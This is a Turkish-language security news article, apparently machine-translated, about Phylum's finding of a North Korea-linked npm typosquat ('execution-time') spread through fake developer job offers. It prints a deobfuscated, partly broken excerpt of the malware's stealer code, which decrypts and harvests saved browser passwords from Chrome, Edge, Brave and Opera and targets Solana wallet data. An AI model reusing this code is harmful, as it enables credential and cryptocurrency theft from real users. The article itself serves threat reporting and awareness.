24 Şubat 2024 – Siber güvenlik araştırmalarında lider olan Phylum, iş arayan yazılım geliştiricilerini hedef alan gelişmiş bir kötü amaçlı yazılım kampanyasını açıkladı.
Palo Alto Network’ün Birim 42’siyle işbirliği içinde tanımlanan bu endişe verici plan, şüpheli olmayan kurbanların Windows sistemlerine kötü amaçlı yazılım dağıtmak için bir kanal görevi gören sahte geliştirici iş tekliflerini içeriyor.
Bu tür kötü amaçlı yazılım dosyalarını, ağları, modülleri ve kayıt defteri etkinliğini şu şekilde analiz edebilirsiniz: HERHANGİ.Kötü amaçlı yazılım korumalı alanını ÇALIŞTIRINve Tehdit İstihbaratı Araması bu, işletim sistemiyle doğrudan tarayıcıdan etkileşim kurmanıza olanak tanır.
Kuzey Koreli aktörlerle bağlantılı olan kampanya, gizlenmiş JavaScript’ten yararlanıyor ve kötü şöhretli BeaverTail kötü amaçlı yazılımıyla bağlantılı. Bu açıklama, Phylum’un açık kaynak ekosistemini kötü niyetli aktörlerden korumaya yönelik devam eden çabalarının bir parçası.
Şirketin en son bulguları, kripto para birimini ve kimlik bilgilerini çalmak için tasarlanmış kötü amaçlı komut dosyaları yükleyen bir kod profili oluşturucu kılığına giren bir npm paketini öne çıkarıyor.
Cyber Security News ile paylaşılan Phylum raporuna göre: Saldırganlar, kötü amaçlı yazılımlarını ustaca bir test dosyası içinde sakladılar ve bu tür kodları tehditlere karşı incelemek için geliştiricilerin ortak gözetiminden yararlandılar. Ancak bu taktik, Phylum araştırmacılarının kötü amaçlı paketi GitHub depolarından şüphelenecek şekilde bağlamasına olanak tanıyan ve bu hain faaliyetlere ilişkin araştırmalarını ilerleten kritik kusurlar içeriyordu.
5 Şubat 2024’te “nino1234” takma adı altındaki bir npm kullanıcısı, execution-time-async meşru paketi yakından taklit eden paket execution-time 27.000’den fazla indirmeye sahip olan yardımcı program.
300.000’den fazla analist ANY.RUN’u kullanıyor, dünya çapında bir kötü amaçlı yazılım analiz sanal alanıdır. En önemli tehditlere ilişkin derinlemesine araştırmalar yürütmek ve davranışlarına ilişkin ayrıntılı raporlar toplamak için topluluğa katılın.
Ücretsiz Demo Talep Edin
Bu sahte paket, gizliliğin kaldırılmasının ardından gerçek amacını ortaya çıkardı: çeşitli tarayıcılardan oturum açma kimlik bilgilerini ve şifrelerini çalmak. İlk hırsızlığın ardından bir Python betiği indirilip çalıştırılıyor, bu da ek indirmeleri tetikliyor ve daha fazla kişisel veriyi tehlikeye atıyor.
Stealer supports multiiple browsers
const K = "/AppData/Local/Microsoft/Edge/User Data",
P = (t, c) => {
result = "";
try {
const r = `${t}`,
e = require(`${homedir}/store.node`);
if (osType != "Windows_NT") return;
const E = "SELECT * FROM logins",
s = `${H("~/")}${c}`;
let F = path.join(s, "Local State");
fs.readFile(F, "utf-8", (t, c) => {
if (!t) {
(mkey = JSON.parse(c)),
(mkey = mkey.os_crypt.encrypted_key),
(mkey = (
var c = atob
r = new Uint8Array(c.length);
for (let t = 0; t < c.length; t++) r
return r;
})(mkey));
try {
const t = e.CryptUnprotectData(mkey.slice(5));
for (ii = 0; ii <= 200; ii++) {
const c = 0 === ii ? "Default" : `Profile ${ii}`,
e = `${s}/${c}/Login Data`,
o = `${s}/t${c}`;
if (!j(e)) continue;
const F = `${r}_${ii}_Profile`;
fs.copyFile(e, o, (c) => {
try {
const c = new sqlite3.Database(o);
c.all(E, (r, e) => {
var E = "";
r ||
e.forEach((c) => {
var r = c.origin_url,
e = c.username_value,
o = c.password_value;
try {
"v" === o.subarray(0, 1).toString() &&
((iv = o.subarray(3, 15)),
(cip = o.subarray(15, o.length - 16)),
cip.length &&
((mmm = crypto.createDecipheriv("aes-256-gcm", t, iv).update(cip)),
(E = `${E}W:${r} U: ${e} P:${mmm.toString(
"latin1"
)}\n\n`)));
} catch
}),
c.close(),
fs.unlink(o,
Ut(F, E);
});
} catch
});
}
} catch
}
});
} catch
},
ot = [
[
"/Library/Application Support/Google/Chrome",
"/.config/google-chrome",
"/AppData/Local/Google/Chrome/User Data",
],
[
"/Library/Application Support/BraveSoftware/Brave-Browser",
"/.config/BraveSoftware/Brave-Browser",
"/AppData/Local/BraveSoftware/Brave-Browser/User Data",
],
[
"/Library/Application Support/com.operasoftware.Opera",
"/.config/opera",
"/AppData/Roaming/Opera Software/Opera Stable/User Data"
],
],
st = "Local Extension Settings", //Local Extension Settings
Bt = "solana_id.txt";Phylum’un keşfi yalnızca bu aldatıcı operasyona ışık tutmakla kalmadı, aynı zamanda geliştirici topluluğunun minnettarlığını da artırdı. Bu planın tuzağına düşmekten kıl payı kurtulan birçok yazılım geliştirici, bu hedefli saldırı hakkında farkındalık yaratmadaki önemli rolü için Phylum’a teşekkür etti.
Soruşturma devam ederken Phylum, açık kaynak alanındaki tehditleri belirleme ve etkisiz hale getirme konusundaki kararlılığını sürdürüyor. Şirket, geliştiricileri ve benzer kuruluşları, özellikle istenmeyen iş teklifleriyle ilgilenirken veya üçüncü taraf paketlerini projelerine entegre ederken dikkatli olmaya çağırıyor.
Sistemlerinizi ve verilerinizi benzer tehditlerden korumaya yönelik daha fazla teknik analiz bilgisi için Phylum’un web sitesini ziyaret edin veya doğrudan siber güvenlik uzmanlarıyla iletişime geçin.
Truva atları, fidye yazılımları, casus yazılımlar, rootkitler, solucanlar ve sıfır gün açıklarından yararlanmalar dahil olmak üzere kötü amaçlı yazılımları engelleyebilirsiniz. Perimeter81 kötü amaçlı yazılım koruması. Hepsi son derece zararlıdır, hasara yol açabilir ve ağınıza zarar verebilir.